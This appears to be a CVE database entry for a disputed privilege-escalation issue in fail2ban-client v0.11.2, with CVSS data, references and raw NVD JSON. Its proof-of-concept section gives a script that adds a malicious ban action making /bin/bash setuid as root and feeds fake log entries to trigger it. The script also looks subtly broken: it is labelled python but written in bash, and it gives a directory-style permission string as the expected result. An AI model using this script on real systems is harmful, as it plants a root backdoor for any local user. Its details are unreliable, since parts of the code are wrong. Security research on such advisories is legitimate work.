CVE-2025-45311

Description

Insecure permissions in fail2ban-client v0.11.2 allows attackers with limited sudo privileges to perform arbitrary operations as root. NOTE: this is disputed by multiple parties because the action for a triggered rule can legitimately be an arbitrary operation as root. Thus, the software is behaving in accordance with its intended privilege model.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

fail2ban-client v0.11.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-45311 PoC - fail2ban-client Privilege Escalation
# Assumptions: Attacker has low-privilege access and sudo rights to fail2ban-client

# Step 1: Create a custom action configuration
cat > /tmp/evil_action.conf << 'EOF'
[Definition]
actionstart = touch /tmp/fail2ban_pwned
actionban = chmod 4777 /bin/bash
actionunban = rm -f /tmp/fail2ban_pwned
EOF

# Step 2: Configure jail to use the malicious action
sudo fail2ban-client set <jail_name> action add /tmp/evil_action.conf

# Step 3: Trigger the ban by generating malicious log entries
for i in {1..10}; do
  echo "$(date) authentication failure for root from attacker" >> /var/log/test.log
done

# Step 4: Wait for fail2ban to process and trigger the action
sleep 5

# Step 5: Verify privilege escalation
ls -la /bin/bash
# If successful, /bin/bash should have setuid bit set (drwsrwxrwx)

# Cleanup
sudo fail2ban-client set <jail_name> action delete /tmp/evil_action.conf

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-45311
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-45311
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-45311/
[4] VulDB https://vuldb.com/cve/CVE-2025-45311
[5] https://gist.github.com/R-Security/1c707a08f9c7f9a91d9d84b5010aaed2
[6] https://github.com/fail2ban/fail2ban/issues/4110
[7] https://packetstorm.news/files/id/189989
[8] http://www.openwall.com/lists/oss-security/2025/12/03/2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-45311", "sourceIdentifier": "[email protected]", "published": "2025-11-26T16:15:47.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "Insecure permissions in fail2ban-client v0.11.2 allows attackers with limited sudo privileges to perform arbitrary operations as root. NOTE: this is disputed by multiple parties because the action for a triggered rule can legitimately be an arbitrary operation as root. Thus, the software is behaving in accordance with its intended privilege model."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://gist.github.com/R-Security/1c707a08f9c7f9a91d9d84b5010aaed2", "source": "[email protected]"}, {"url": "https://github.com/fail2ban/fail2ban/issues/4110", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/189989", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/03/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}